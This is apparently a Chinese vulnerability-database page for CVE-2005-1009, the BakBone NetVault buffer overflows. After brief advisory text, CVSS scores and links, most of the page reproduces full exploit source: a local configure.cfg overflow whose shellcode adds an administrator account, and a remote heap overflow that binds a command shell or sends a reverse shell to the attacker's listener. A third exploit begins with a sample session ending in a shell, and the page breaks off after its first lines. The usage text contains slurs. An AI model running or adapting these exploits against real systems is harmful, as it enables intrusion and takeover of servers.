CVE-2005-1009
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:47:56
NMCOEPS    

[原文]Multiple buffer overflows in BakBone NetVault 6.x and 7.x allow (1) remote attackers to execute arbitrary code via a modified computer name and length that leads to a heap-based buffer overflow, or (2) local users to execute arbitrary code via a long Name entry in the configure.cfg file.


[CNNVD]BakBone NetVault远程内存破坏漏洞(CNNVD-200505-437)

        NetVault是一款专业的数据备份及恢复系统,支持Windows和Linux/Unix类操作系统。NetVault对请求处理上存在内存改写破坏漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:bakbone:netvault:7.0
cpe:/a:bakbone:netvault:7.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1009
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1009
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-437
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/19932
(UNKNOWN)  XF  netvault-configurecfg-bo(19932)
http://www.securityfocus.com/bid/12967
(UNKNOWN)  BID  12967
http://www.securityfocus.com/archive/1/394801
(VENDOR_ADVISORY)  BUGTRAQ  20050401 [Hat-Squad Advisory] Bakbone NetVault Heap overflow Vulnerabilities
http://www.hat-squad.com/en/000165.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000165.html
http://www.hat-squad.com/en/000164.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000164.html
http://www.class101.org/netv-remhbof.pdf
(VENDOR_ADVISORY)  MISC  http://www.class101.org/netv-remhbof.pdf
http://www.class101.org/netv-locsbof.pdf
(VENDOR_ADVISORY)  MISC  http://www.class101.org/netv-locsbof.pdf
http://securitytracker.com/id?1013625
(UNKNOWN)  SECTRACK  1013625
http://secunia.com/advisories/14814
(VENDOR_ADVISORY)  SECUNIA  14814

- 漏洞信息

BakBone NetVault远程内存破坏漏洞
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        NetVault是一款专业的数据备份及恢复系统,支持Windows和Linux/Unix类操作系统。NetVault对请求处理上存在内存改写破坏漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.bakbone.com/

- 漏洞信息 (905)

BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit (EDBID:905)
windows local
2005-04-01 Verified
0 class101
N/A [点击下载]
/*
for more informations class101.org/netv-locsbof.pdf
*/

#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
/*add u:class101 p:class101 (*Administrators *users)*/
"\x33\xC9\x83\xE9\xC7\xE8\xFF\xFF\xFF\xFF\xC0\x5E\x81\x76\x0E\x15"
"\x90\x39\xE8\x83\xEE\xFC\xE2\xF4\xE9\x78\x7F\xE8\x15\x90\xB2\xAD"
"\x29\x1B\x45\xED\x6D\x91\xD6\x63\x5A\x88\xB2\xB7\x35\x91\xD2\x0B"
"\x3B\xD9\xB2\xDC\x9E\x91\xD7\xD9\xD5\x09\x95\x6C\xD5\xE4\x3E\x29"
"\xDF\x9D\x38\x2A\xFE\x64\x02\xBC\x31\x94\x4C\x0B\x9E\xCF\x1D\xE9"
"\xFE\xF6\xB2\xE4\x5E\x1B\x66\xF4\x14\x7B\xB2\xF4\x9E\x91\xD2\x61"
"\x49\xB4\x3D\x2B\x24\x50\x5D\x63\x55\xA0\xBC\x28\x6D\x9F\xB2\xA8"
"\x19\x1B\x49\xF4\xB8\x1B\x51\xE0\xFC\x9B\x39\xE8\x15\x1B\x79\xDC"
"\x10\xEC\x39\xE8\x15\x1B\x51\xD4\x4A\xA1\xCF\x88\x43\x7B\x34\x80"
"\xFA\x5E\xD9\x88\x7D\x08\xC7\x62\x1B\xC7\xC6\x0F\xFD\x7E\xC6\x17"
"\xEA\xF3\x54\x8C\x3B\xF5\x41\x8D\x35\xBF\x5A\xC8\x7B\xF5\x4D\xC8"
"\x60\xE3\x5C\x9A\x35\xF3\x55\x89\x66\xE3\x08\xD8\x24\xB0\x5A\x84"
"\x74\xE3\x4A\xD9\x25\xA1\x19\xC7\x54\xD4\x7D\xC8\x33\xB6\x19\x86"
"\x70\xE4\x19\x84\x7A\xF3\x58\x84\x72\xE2\x56\x9D\x65\xB0\x78\x8C"
"\x78\xF9\x57\x81\x66\xE4\x4B\x89\x61\xFF\x4B\x9B\x35\xF3\x55\x89"
"\x66\xE3\x08\xD8\x24\xB0\x16\xA9\x51\xD4\x39\xE8";


static char payload[8000];
FILE *fl, *fl2;
char *fp, line[1024];

int check(int argc,char *argv[]),i=0,j=0;
int check2();
void ver();
void usage(char* us);

char EOL[]="\x0D\x0A";
char esp[]="\xDD\x20\x02\x10";
char vul[]="\x4E\x61\x6D\x65\x3D";
char fun[]="\x3C\x63\x30\x64\x33\x72\x3E\x20\x27\x6C\x6F\x20\x49\x27\x6D\x20"
"\x67\x61\x79\x20\x49\x27\x6D\x20\x66\x72\x6F\x6D\x20\x49\x48\x53";


int main(int argc,char *argv[])
{
ver();
if (argc>5||argc<2||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (check(argc,argv)==-1){return -1;}
while (!feof(fl))
{
fgets(line, sizeof(line),fl);
if (strstr(line,vul)){
i++;j++;}
if (i==2){
strcpy(line,vul);
memset(line+5,0x90,600);
memcpy(line+252,esp,4);
memcpy(line+16,fun,32);
memcpy(line+260,scode1,strlen(scode1));
memcpy(line+605,EOL,2);i=0;j++;
}
strcat(payload,line);
}
if (strstr(payload,vul)==NULL||j==1){
printf("[+] \"%s\" isn't a default NetVault file..\n",fp);return -1;}
if (check2()==1){
fprintf(fl,"%s",payload);
printf("[+] \"%s\" correctly exploited\n",fp);
printf("[+] a service restart is needed to execute the payload\n");
}
else printf("[+] can't write to \"%s\", something is wrong...\n",fp);
return 0;

}

int check(int argc,char *argv[])
{
if (argc>2){fp=argv[2];}
else fp="configure.cfg";
if ((fl =fopen(fp,"r+"))==NULL){
printf("[+] \"%s\" not found or no rights to read/write\n",fp);return -1;}
return 1;
}

int check2()
{
if ((fl =fopen(fp,"r+"))==NULL)
return -1;
else return 1;
}

void usage(char* us)
{
printf("[+] . 101_netv.exe Target (adduser mode) \n");
printf("[+] . 101_netv.exe Target YourFile.cfg (adduser mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 1. WinXP SP0 Pro. English - v5.1.2600 \n");
printf("[+] 1. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 1. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("[+] 1. WinXP SP2 Pro. English (*) - v5.1.2600.2180 \n");
printf("[+] 1. Win2k3 SP0 Server English (*) - v5.2.3790 \n");
printf("NOTE: \n");
printf("The exploit mods the netvault's cfg file to add a win32 \n");
printf("user:class101 pass:class101 after a restart of the netvault service. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf("Compilation msvc6, cygwin, Linux. \n");
return;
}

void ver()
{
printf(" \n");
printf("==================================[v0.1]====\n");
printf("=====BakBone NetVault, Backup Server===============\n");
printf("=====Computername, Local Buffer Overflow Exploit=========\n");
printf("======coded by class101=======[Hat-Squad.com 2005]=====\n");
printf("============================================\n");
printf(" \n");
}

// milw0rm.com [2005-04-01]
		

- 漏洞信息 (906)

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2) (EDBID:906)
windows remote
2005-04-01 Verified
20031 class101
N/A [点击下载]
/*
for more informations class101.org/netv-remhbof.pdf
*/

#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";


char scodeA[] =
"\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";

char scodeB[] =
"\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
"\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";

char scodeC[] =
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"
"\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
"\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"
"\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
"\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
"\x02\x00\x00\x00";

char scodeD[] =
"\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
"\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
"\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
"\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
"\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
"\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
"\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
"\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"
"\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
"\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";

char grabcpname[] =
"\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x00\x00\x00\x00\x00\x00\x00";

char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],cpname[1024],sz[1024],szb[1024],szb2[1024];
int tot,tot2,l00p=0;

char sip[3],spo[1],pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
char padA[]="\x00\x00\x00";
char szc[]="\xFF\xFF";

// rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77],77F82060
//for litchfield this method is reliable due to the fixed address 0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because you realiably repair the functions across all nt based os?, and where to realiably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and your shellcode will be executed
//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);
void sl(int time);

int main(int argc,char *argv[])
{
ver();
int check1, check2, rc, i, j, k;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
loop:
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro English\n";}
if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. English\n[+] WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
if (l00p==0){printf("[+] TARGET: %s\n",os);sl(1);}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
if (l00p==0)
{
printf("[+] connection 1: grabbing computername via netvault...\n");
sl(2);
send(s,grabcpname,sizeof(grabcpname)-1,0);
rc = recv(s,recvbuf,sizeof(recvbuf),0);
if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or patched, aborting..\n");return -1;}
else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..\n");return -1;}
else printf("[+] analyzing packets, sorting computername\n");
sl(2);
printf("[+] bufsize: %d\n",rc);sl(1);
for (i=80,j=0;recvbuf[i]!=0;i++,j++)
{
memset(cpname+j,recvbuf[i],1);
}
memset(sz,strlen(cpname)+1,1);
memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
memset(ver2+4,recvbuf[rc-34],1);
printf("[+] cmpname: %s\n",cpname);sl(1);
printf("[+] version: %s\n",ver2);sl(1);l00p++;
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
goto loop;
}
printf("[+]\n[+] connection 2: modding payload regarding computername and length\n");sl(1);
printf("[+] loading attack\n");sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
k=7-strlen(cpname);
memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417); rtl
// rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
// rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+k+31914,scode2,strlen(scode2));
}
else memcpy(payload2+k+31914,scode1,strlen(scode1));
tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
tot2=tot-192;
memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
memcpy(scodeC+254,szc,2);
printf("[+] sh0uting the heap!\n");sl(3);
if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
sl(6);
printf("[+]\n[+] size of payload: %d\n",tot);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}


void usage(char* us)
{

printf(" \n");
printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");
printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("NOTE: \n");
printf("The exploit bind a cmdshell port 101 or \n");
printf("reverse a cmdshell on your listener. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}

void ver()
{
printf(" \n");
printf("============================[v0.1]====\n");
printf("=====BakBone NetVault, Backup Server===============\n");
printf("=====Clientname, Remote Heap Overflow Exploit==========\n");
printf("====coded by class101======[Hat-Squad.com 2005]=====\n");
printf("============================================\n");
printf(" \n");
}

void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}

// milw0rm.com [2005-04-01]
		

- 漏洞信息 (990)

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow (EDBID:990)
windows remote
2005-05-17 Verified
20031 nolimit
N/A [点击下载]
/* Bakbone Netvault heap overflow exploit. 
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.

As class101 has already shown, this application has a lot of holes. 
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd recieve
the same response class did, which was none. So perhaps a second critical vulnerabilty
will wake Bakbone up to their software faults. 

A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
 so it's just as vulnerable as this. Not to mention the fact that not many businesses
 use this software anyway.
 ..Maybe it's because of all the holes??

Thx to Flare, AceHigh, Shift,class101, and of course BuzzDee.
Sorry.. everyone wants to be famous :)


 C:\CODING\c++\netvault\Release>netvault 1 2KVM
[*] Target:     2KVM    Port: 20031

Targetting 2K..
[*] Socket initialized...
[*] Sending  buffer.
[*] Sleeping..............
[*] Connecting again to trigger overflow..
[*] Connecting to host: 2KVM on port 101
[*] Exploit worked! dropping into shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\BakBone Software\NetVault>
-nolimit@COREiSO
*/
#include <stdio.h>
#include <string.h>
#include <io.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

void cmdshell (int sock);
